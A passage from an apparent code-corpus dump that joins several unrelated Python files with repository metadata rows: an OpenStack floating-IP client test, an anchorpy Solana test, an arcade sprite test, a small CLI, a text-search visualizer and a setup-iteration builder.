"network_id": "02dd8479-ef26-4398-a102-d19d0a7b3a1f",
"device_owner": "compute:nova",
"mac_address": "fa:16:3e:b1:3b:30",
"device_id": "8e3941b4-a6e9-499f-a1ac-2a4662025cba"
},
"tags": ["tag1,tag2"],
"port_forwardings": []
},
{
"router_id": None,
"description": "for test",
"dns_domain": "my-domain.org.",
"dns_name": "myfip2",
"created_at": "2016-12-21T11:55:50Z",
"updated_at": "2016-12-21T11:55:53Z",
"revision_number": 2,
"project_id": "4969c491a3c74ee4af974e6d800c62de",
"tenant_id": "4969c491a3c74ee4af974e6d800c62de",
"floating_network_id": "376da547-b977-4cfe-9cba-275c80debf57",
"fixed_ip_address": None,
"floating_ip_address": "172.24.4.227",
"port_id": None,
"id": "61cea855-49cb-4846-997d-801b70c71bdd",
"status": "DOWN",
"port_details": None,
"tags": ["tag1,tag2"],
"port_forwardings": []
}
]
}
FAKE_FLOATING_IP_ID = "2f245a7b-796b-4f26-9cf9-9e82d248fda7"
def setUp(self):
super(TestFloatingIPsClient, self).setUp()
fake_auth = fake_auth_provider.FakeAuthProvider()
self.floating_ips_client = floating_ips_client.FloatingIPsClient(
fake_auth, "compute", "regionOne")
def _test_list_floatingips(self, bytes_body=False):
self.check_service_client_function(
self.floating_ips_client.list_floatingips,
"tempest.lib.common.rest_client.RestClient.get",
self.FAKE_FLOATING_IPS,
bytes_body,
200)
def _test_create_floatingip(self, bytes_body=False):
self.check_service_client_function(
self.floating_ips_client.create_floatingip,
"tempest.lib.common.rest_client.RestClient.post",
{"floatingip": self.FAKE_FLOATING_IPS["floatingips"][1]},
bytes_body,
201,
floating_network_id="172.24.4.228")
def _test_show_floatingip(self, bytes_body=False):
self.check_service_client_function(
self.floating_ips_client.show_floatingip,
"tempest.lib.common.rest_client.RestClient.get",
{"floatingip": self.FAKE_FLOATING_IPS["floatingips"][0]},
bytes_body,
200,
floatingip_id=self.FAKE_FLOATING_IP_ID)
def _test_update_floatingip(self, bytes_body=False):
update_kwargs = {
"port_id": "fc861431-0e6c-4842-a0ed-e2363f9bc3a8"
}
resp_body = {
"floatingip": copy.deepcopy(
self.FAKE_FLOATING_IPS["floatingips"][0]
)
}
resp_body["floatingip"].update(update_kwargs)
self.check_service_client_function(
self.floating_ips_client.update_floatingip,
"tempest.lib.common.rest_client.RestClient.put",
resp_body,
bytes_body,
200,
floatingip_id=self.FAKE_FLOATING_IP_ID,
**update_kwargs)
def test_list_floatingips_with_str_body(self):
self._test_list_floatingips()
def test_list_floatingips_with_bytes_body(self):
self._test_list_floatingips(bytes_body=True)
def test_create_floatingip_with_str_body(self):
self._test_create_floatingip()
def test_create_floatingip_with_bytes_body(self):
self._test_create_floatingip(bytes_body=True)
def test_show_floatingips_with_str_body(self):
self._test_show_floatingip()
def test_show_floatingips_with_bytes_body(self):
self._test_show_floatingip(bytes_body=True)
def test_update_floatingip_with_str_body(self):
self._test_update_floatingip()
def test_update_floatingip_with_bytes_body(self):
self._test_update_floatingip(bytes_body=True)
def test_delete_floatingip(self):
self.check_service_client_function(
self.floating_ips_client.delete_floatingip,
'tempest.lib.common.rest_client.RestClient.delete',
{},
status=204,
floatingip_id=self.FAKE_FLOATING_IP_ID)
| 38.304878 | 78 | 0.607291 | 680 | 6,282 | 5.3 | 0.317647 | 0.039956 | 0.037736 | 0.035516 | 0.553274 | 0.493063 | 0.368757 | 0.220588 | 0.220588 | 0.192286 | 0 | 0.089606 | 0.289398 | 6,282 | 163 | 79 | 38.539877 | 0.717742 | 0.095989 | 0 | 0.244094 | 0 | 0 | 0.268008 | 0.126589 | 0 | 0 | 0 | 0 | 0 | 1 | 0.110236 | false | 0 | 0.031496 | 0 | 0.165354 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f732aa0326f3a235a799ebf50e051d05c5952e | 2,277 | py | Python | tests/test_composite.py | snuderl/anchorpy | cd6895bf2f171a79ac70618b79745668581df299 | [
"MIT"
] | 1 | 2022-01-06T07:42:36.000Z | 2022-01-06T07:42:36.000Z | tests/test_composite.py | snuderl/anchorpy | cd6895bf2f171a79ac70618b79745668581df299 | [
"MIT"
] | null | null | null | tests/test_composite.py | snuderl/anchorpy | cd6895bf2f171a79ac70618b79745668581df299 | [
"MIT"
] | null | null | null | """Mimics anchor/tests/composite/tests/composite.js."""
from pytest import mark, fixture
from solana.keypair import Keypair
from solana.sysvar import SYSVAR_RENT_PUBKEY
from anchorpy import Program, Context
from anchorpy.workspace import WorkspaceType
from anchorpy.pytest_plugin import workspace_fixture
workspace = workspace_fixture("anchor/tests/composite/")
@fixture(scope="module")
def program(workspace: WorkspaceType) -> Program:
"""Create a Program instance."""
return workspace["composite"]
@fixture(scope="module")
async def initialized_accounts(program: Program) -> tuple[Keypair, Keypair]:
"""Generate keypairs and use them when callling the initialize function."""
dummy_a = Keypair()
dummy_b = Keypair()
await program.rpc["initialize"](
ctx=Context(
accounts={
"dummy_a": dummy_a.public_key,
"dummy_b": dummy_b.public_key,
"rent": SYSVAR_RENT_PUBKEY,
},
signers=[dummy_a, dummy_b],
pre_instructions=[
await program.account["DummyA"].create_instruction(dummy_a),
await program.account["DummyB"].create_instruction(dummy_b),
],
),
)
return dummy_a, dummy_b
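    # pre_instructions prepend the two account-creation instructions to the
    # same transaction, so both Dummy accounts exist before `initialize` runs.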
@fixture(scope="module")
async def composite_updated_accounts(
program: Program,
initialized_accounts: tuple[Keypair, Keypair],
) -> tuple[Keypair, Keypair]:
"""Run composite_update and return the keypairs used."""
dummy_a, dummy_b = initialized_accounts
ctx = Context(
accounts={
"foo": {"dummy_a": dummy_a.public_key},
"bar": {"dummy_b": dummy_b.public_key},
},
)
await program.rpc["composite_update"](1234, 4321, ctx=ctx)
return initialized_accounts
@mark.asyncio
async def test_composite_update(
program: Program,
composite_updated_accounts: tuple[Keypair, Keypair],
) -> None:
"""Test that the call to composite_update worked."""
dummy_a, dummy_b = composite_updated_accounts
dummy_a_account = await program.account["DummyA"].fetch(dummy_a.public_key)
dummy_b_account = await program.account["DummyB"].fetch(dummy_b.public_key)
assert dummy_a_account.data == 1234
assert dummy_b_account.data == 4321
| 32.528571 | 79 | 0.681599 | 269 | 2,277 | 5.542751 | 0.275093 | 0.052314 | 0.044266 | 0.032193 | 0.105298 | 0.070423 | 0 | 0 | 0 | 0 | 0 | 0.008879 | 0.208608 | 2,277 | 69 | 80 | 33 | 0.818535 | 0.033377 | 0 | 0.169811 | 0 | 0 | 0.068759 | 0.01146 | 0 | 0 | 0 | 0 | 0.037736 | 1 | 0.018868 | false | 0 | 0.113208 | 0 | 0.188679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8f977f69610ce02d3e547646c38544aaa91abfe | 2,882 | py | Python | tests/unit2/test_sprite_animated_old.py | yegarti/arcade | 1862e61aab9a7dc646265005b0e808d953a9dfe3 | [
"MIT"
] | 824 | 2016-01-07T19:27:57.000Z | 2020-08-01T03:15:47.000Z | tests/unit2/test_sprite_animated_old.py | yegarti/arcade | 1862e61aab9a7dc646265005b0e808d953a9dfe3 | [
"MIT"
] | 646 | 2016-01-08T02:42:31.000Z | 2020-08-03T14:13:27.000Z | tests/unit2/test_sprite_animated_old.py | yegarti/arcade | 1862e61aab9a7dc646265005b0e808d953a9dfe3 | [
"MIT"
] | 221 | 2016-01-07T22:36:33.000Z | 2020-07-24T23:30:08.000Z | import pytest
import arcade
COIN_SCALE = 0.5
frame_count = 0
def test_sprite_animated_old(window: arcade.Window):
global frame_count
frame_count = 0
SCREEN_WIDTH = window.width
SCREEN_HEIGHT = window.height
arcade.set_background_color(arcade.color.AMAZON)
character_list = arcade.SpriteList()
player = arcade.AnimatedWalkingSprite()
player.scale = 1
player.stand_right_textures = []
player.stand_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_idle.png"))
player.stand_left_textures = []
player.stand_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_idle.png", flipped_horizontally=True))
player.walk_right_textures = []
player.walk_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk0.png"))
player.walk_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk1.png"))
player.walk_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk2.png"))
player.walk_right_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk3.png"))
player.walk_left_textures = []
player.walk_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk0.png",
flipped_horizontally=True))
player.walk_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk1.png",
flipped_horizontally=True))
player.walk_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk2.png",
flipped_horizontally=True))
player.walk_left_textures.append(
arcade.load_texture(":resources:images/animated_characters/female_person/femalePerson_walk3.png",
flipped_horizontally=True))
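    # The eight appends above could be written as a loop (equivalent sketch):
    #   for i in range(4):
    #       tex = (":resources:images/animated_characters/female_person/"
    #              f"femalePerson_walk{i}.png")
    #       player.walk_right_textures.append(arcade.load_texture(tex))
    #       player.walk_left_textures.append(
    #           arcade.load_texture(tex, flipped_horizontally=True))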
player.texture_change_distance = 20
player.center_x = SCREEN_WIDTH // 2
player.center_y = SCREEN_HEIGHT // 2
player.scale = 0.8
player.change_x = 2
player.texture = player.stand_left_textures[0]
character_list.append(player)
def on_draw():
arcade.start_render()
character_list.draw()
def update(delta_time):
global frame_count
frame_count += 1
if frame_count == 70:
player.change_x *= -1
character_list.update()
character_list.update_animation(delta_time)
window.on_draw = on_draw
window.update = update
window.test(150)
| 36.481013 | 132 | 0.72415 | 334 | 2,882 | 5.922156 | 0.212575 | 0.070779 | 0.101112 | 0.121335 | 0.64004 | 0.59909 | 0.582406 | 0.582406 | 0.582406 | 0.582406 | 0 | 0.011925 | 0.185288 | 2,882 | 78 | 133 | 36.948718 | 0.830494 | 0 | 0 | 0.262295 | 0 | 0 | 0.256072 | 0.256072 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04918 | false | 0 | 0.032787 | 0 | 0.081967 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8fb3ed9979c05dd8fcbf25c60a7190b391575b1 | 1,185 | py | Python | src/runControl/cli.py | medvir/runControl | 96143adb1cad895098dacc587ff4d665697f2f43 | [
"MIT"
] | null | null | null | src/runControl/cli.py | medvir/runControl | 96143adb1cad895098dacc587ff4d665697f2f43 | [
"MIT"
] | null | null | null | src/runControl/cli.py | medvir/runControl | 96143adb1cad895098dacc587ff4d665697f2f43 | [
"MIT"
] | 1 | 2019-08-08T11:23:27.000Z | 2019-08-08T11:23:27.000Z | # -*- coding: utf-8 -*-
"""The command line file
"""
import argparse
import sys
from pkg_resources import (get_distribution, DistributionNotFound)
try:
__version__ = get_distribution('runControl').version
except DistributionNotFound:
__version__ = 'unknown'
# Parse command line
parser = argparse.ArgumentParser()
# First define all option groups
group1 = parser.add_argument_group('Input file', 'Required input')
group1.add_argument("-f", "--csv", default="", type=str, dest="f",
help="input reads in csv format")
group1.add_argument('-v', '--version', action='version',
version=__version__)
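# Example invocation (the console-script name is an assumption):
#   runControl -f reads.csv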
# Exit if no input file is provided
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
def main(args=None):
import logging
import logging.handlers
args = parser.parse_args(args=args)
log_format = '%(levelname)s %(asctime)s %(filename)s: %(funcName)s() %(lineno)d: \t%(message)s'
logging.basicConfig(filename='runko.log', level=logging.INFO,
format=log_format, datefmt='%Y/%m/%d %H:%M:%S')
logging.info(' '.join(sys.argv))
from runControl import run
run.main(args.f)
| 26.931818 | 99 | 0.661603 | 151 | 1,185 | 5.039735 | 0.543046 | 0.043364 | 0.044678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005219 | 0.191561 | 1,185 | 43 | 100 | 27.55814 | 0.789144 | 0.108017 | 0 | 0 | 0 | 0.038462 | 0.190249 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.230769 | 0 | 0.269231 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8ff115bca47b4c097934126e0dc09854f98fc3b | 5,562 | py | Python | archive/2021-03-7/tools/cx_analysis/search.py | CambridgeSemiticsLab/BH_time_collocations | 2d1864b6e9cd26624c769ee1e970d69d19da7fbf | [
"CC-BY-4.0"
] | 5 | 2019-06-19T19:42:21.000Z | 2021-04-20T22:43:45.000Z | archive/2021-03-7/tools/cx_analysis/search.py | CambridgeSemiticsLab/BHTenseAndAspect | 2d1864b6e9cd26624c769ee1e970d69d19da7fbf | [
"CC-BY-4.0"
] | 2 | 2020-02-25T10:19:40.000Z | 2020-03-13T15:29:01.000Z | archive/2021-03-7/tools/cx_analysis/search.py | CambridgeSemiticsLab/BHTenseAndAspect | 2d1864b6e9cd26624c769ee1e970d69d19da7fbf | [
"CC-BY-4.0"
] | null | null | null | import random
import itertools
import networkx as nx
from IPython.display import display, HTML
from datetime import datetime
from pprint import pprint
from .cx import Construction
class SearchCX:
"""Methods for visualizing construction objects with TF"""
def __init__(self, tf_app):
"""Set up TF methods for class-wide use"""
api = tf_app.api
self.F,self.T,self.L = api.F, api.T, api.L
self.app = tf_app
def pretty(self, obj, condense='phrase', **kwargs):
"""Show a linguistic object that is not native to TF app."""
L = self.L
A = self.app
index = kwargs.get('index')
kwargs = {k:v for k,v in kwargs.items() if k not in {'index'}}
show = L.d(obj, condense) if index is None else (L.d(obj, condense)[index],)
print(show, not index, index)
A.prettyTuple(show, seq=kwargs.get('seq', obj), **kwargs)
def prettyconds(self, cx):
        '''
        Iterate through the cases checked for a construction/relation
        and print out all of the evaluated conditions.
        '''
cx_tree = [
n for n in nx.bfs_tree(cx.graph, cx)
if type(n) == Construction
]
for node in cx_tree:
print(f'-- {node} --')
for case in node.cases:
print(f'pattern: {case.get("pattern", case["name"])}')
for cond, value in case['conds'].items():
print('{:<30} {:>30}'.format(cond, str(value)))
print()
def showcx(self, cx, conds=False, **kwargs):
"""Display a construction object with TF.
Calls TF.show() with HTML highlights for
words/stretch of words that serve a role
within the construction.
"""
L = self.L
A = self.app
def get_phrase(slot):
timephrase = L.u(slot,'timephrase')
if timephrase:
return timephrase[0]
else:
return L.u(slot,'phrase')[0]
# get slots for display
refslots = cx.slots if cx.slots else cx.element.slots
showcontext = tuple(set(L.u(s, 'phrase')[0] for s in refslots))
timephrase = get_phrase(refslots[0])
params = kwargs
params['extraFeatures'] = params.get('extraFeatures','sp st lex')
params['withNodes'] = params.get('withNodes', True)
params['seq'] = f'{timephrase} -> {cx}'
if not cx:
print('NO MATCHES')
print('-'*20)
A.prettyTuple(showcontext, **params)
if conds:
self.prettyconds(cx)
return None
colors = itertools.cycle([
'#96ceb4', '#ffeead', '#ffcc5c', '#ff6f69',
'#bccad6', '#8d9db6', '#667292', '#f1e3dd',
])
highlights = {}
role2color = {}
for node in cx.graph.adj[cx]:
role = cx.graph[cx][node]['role']
slots = cx.getslots(node)
color = next(colors)
role2color[role] = color
for slot in slots:
highlights[slot] = color
params['highlights'] = highlights
A.prettyTuple(
showcontext,
**params
)
# reveal color meanings
for role,color in role2color.items():
colmean = '<div style="background: {}; text-align: center">{}</div>'.format(color, role)
display(HTML(colmean))
pprint(cx.unfoldroles(), indent=4)
print()
if conds:
self.prettyconds(cx)
display(HTML('<hr>'))
def search(self, elements, cxtest, pattern='',
show=None, end=None, shuffle=True,
updatei=1000, select=None, **kwargs):
"""Search phrases for a specified relation"""
start = datetime.now()
print('beginning search')
# random shuffle to get good diversity of examples
if shuffle:
random.shuffle(elements)
matches = []
# iterate and find matches on words
for i,el in enumerate(elements):
# update every 5000 iterations
if i%updatei == 0:
print(f'\t{len(matches)} found ({i}/{len(elements)})')
# run test for construction
test = cxtest(el)
# save results
if test:
if pattern:
if test.pattern == pattern:
matches.append(test)
else:
matches.append(test)
# stop at end
if end and len(matches) == end:
break
# display
print('done at', datetime.now() - start)
print(len(matches), 'matches found...')
if show:
print(f'showing top {show}')
# option for filtering results
if select:
matches = [m for m in matches if select(m)]
print(f'\tresults filtered to {len(matches)}')
for match in matches[:show]:
self.showcx(match, **kwargs)
return matches
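# Usage sketch (names illustrative): given a list of element nodes and a
# test function that returns a Construction or None:
#   searcher = SearchCX(A)
#   matches = searcher.search(phrases, cxtest=my_test, show=5, end=50)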
# NB: For the future. Here is a template to plot
# a network graph using networkx.
# import matplotlib.pyplot as plt
# graph = GIVE GRAPH HERE
# plt.figure(figsize=(10,5))
# pos = nx.drawing.spectral_layout(graph)
# nx.draw_networkx(graph, pos)
# edge_labels = {
# (n1,n2):graph[n1][n2]['role']
# for n1,n2 in graph.edges
# }
# nx.draw_networkx_edge_labels(graph, pos, font_size=10, edge_labels=edge_labels)
# plt.show()
| 30.729282 | 100 | 0.529486 | 649 | 5,562 | 4.505393 | 0.337442 | 0.01026 | 0.004104 | 0.004788 | 0.025992 | 0.009576 | 0 | 0 | 0 | 0 | 0 | 0.014673 | 0.350593 | 5,562 | 180 | 101 | 30.9 | 0.794851 | 0.186624 | 0 | 0.126126 | 0 | 0 | 0.106277 | 0.004759 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.063063 | 0 | 0.162162 | 0.144144 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3300c1bad34bb6227e54c8b071cf977586ed7f3c | 1,014 | py | Python | apetools/builders/subbuilders/setupiterationbuilder.py | rsnakamura/oldape | b4d1c77e1d611fe2b30768b42bdc7493afb0ea95 | [
"Apache-2.0"
] | null | null | null | apetools/builders/subbuilders/setupiterationbuilder.py | rsnakamura/oldape | b4d1c77e1d611fe2b30768b42bdc7493afb0ea95 | [
"Apache-2.0"
] | null | null | null | apetools/builders/subbuilders/setupiterationbuilder.py | rsnakamura/oldape | b4d1c77e1d611fe2b30768b42bdc7493afb0ea95 | [
"Apache-2.0"
] | null | null | null |
from apetools.tools import setupiteration
class SetupIterationBuilder(object):
"""
A SetupIterationBuilder builds Setup Iteration runners
"""
def __init__(self, device, affector, time_to_recovery):
"""
:param:
- `device`: A connection to the DUT
- `affector`: An environmental affector
- `time_to_recovery`: A time to recovery tester
"""
self.device = device
self.affector = affector
self.time_to_recovery = time_to_recovery
self._setup = None
return
@property
def setup(self):
"""
:return: A setup iteration runner
"""
if self._setup is None:
self._setup = setupiteration.SetupIteration(device=self.device,
time_to_recovery=self.time_to_recovery,
affector=self.affector)
return self._setup
# end class SetupIterationBuilder
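# Usage sketch (the collaborator objects are assumed):
#   builder = SetupIterationBuilder(device, affector, time_to_recovery)
#   runner = builder.setup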
| 28.971429 | 95 | 0.565089 | 95 | 1,014 | 5.821053 | 0.368421 | 0.075949 | 0.177215 | 0.079566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.362919 | 1,014 | 34 | 96 | 29.823529 | 0.856037 | 0.253452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.066667 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |